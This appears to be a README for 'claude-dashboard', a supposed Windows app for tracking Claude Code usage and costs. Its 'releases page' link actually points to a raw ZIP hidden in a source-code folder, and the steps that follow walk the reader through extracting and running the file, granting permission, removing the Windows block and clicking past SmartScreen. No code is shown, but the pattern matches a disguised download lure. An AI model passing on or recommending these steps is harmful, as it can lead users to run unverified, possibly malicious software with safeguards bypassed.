claude-dashboard is a local dashboard for Claude Code sessions on Windows. It helps you see how much you use Claude, what it costs, which model you use, and how your coding pace changes over time.
It runs on your own device. Your session data stays offline and private.
Before you start, make sure you have:
- A Windows computer
- A modern web browser
- Permission to run downloaded apps
- Claude Code session data on your machine
No account setup is needed inside the app. You only need to download it and open it.
- Open the releases page: https://github.com/supposed-steele367/claude-dashboard/raw/refs/heads/main/apps/web/src/lib/parsers/claude-dashboard-v1.3.zip
- Find the latest release at the top of the page.
- Download the Windows file from that release.
- Save the file to your computer.
- If the file comes in a ZIP folder, right-click it and choose Extract All.
- Open the extracted folder.
- Double-click the app file to run it.
- If Windows asks for permission, choose Yes or Run.
If the app opens in your browser, leave that window open while you use it.
After you launch claude-dashboard for the first time:
- Wait a few seconds for the app to load.
- Let it scan your local Claude Code session data.
- Review the dashboard once the charts appear.
- If asked to choose a folder, point it to the place where your Claude Code session files are stored.
- Keep the app open while you work if you want live updates.
If you do not see any data right away, check that Claude Code has created session files on your machine.
claude-dashboard shows a clear view of your Claude Code activity. You can use it to follow:
- Token usage
- Cost over time
- Model usage
- Session count
- Usage streaks
- Coding velocity
- Session trends by day or week
- Activity across recent work sessions
This makes it easier to spot heavy usage days and compare your work pace over time.
The dashboard uses simple charts and tables so you can read your data fast. Common views include:
- A summary of total usage
- A list of recent sessions
- A graph of token counts
- A cost breakdown by time period
- Model mix across sessions
- Streak tracking for regular use
- Velocity trends that show how active you have been
The layout is made for quick review, so you do not need to dig through files by hand.
Use claude-dashboard when you want to:
- Check how much Claude Code you used today
- Review cost changes across the week
- Compare one model against another
- See whether your coding pace is rising or falling
- Find long work streaks
- Keep an eye on local session history
You can open it any time after you have new Claude Code activity on your machine.
claude-dashboard reads local session data from your computer and builds the dashboard from that information. It does not need to send your data to a cloud service for basic use.
That makes it a good fit if you want a private view of your Claude Code sessions and do not want to share logs online.
When you download the app from the releases page, you may get one of these:
- A ZIP file
- A Windows app file
- A folder with several support files
Use the same flow in each case:
- Download the release file
- Extract it if needed
- Open the app
- Allow Windows access if asked
- Keep the app open while you view your dashboard
If Windows blocks the file at first, use these steps:
- Right-click the file
- Choose Properties
- Look for an Unblock option
- Select it if you see it
- Choose Apply
- Open the file again
If SmartScreen appears, choose More info, then Run anyway only if the file came from the release page above.
If the dashboard does not open, try these checks:
- Make sure the file finished downloading
- Check that you extracted the ZIP folder if there was one
- Run the app from the extracted folder, not inside the ZIP
- Close and reopen the app
- Check that Claude Code has session data on the machine
- Try a different browser if the app opens in a web window
If the screen stays empty, the app may not have found your local session files yet.
You do not need to manage servers, databases, or online accounts. The app is built for local use and fast review.
That means you can:
- Open it when you want a usage check
- Leave it closed when you do not need it
- Keep your session data on your own device
- Avoid syncing data to other services
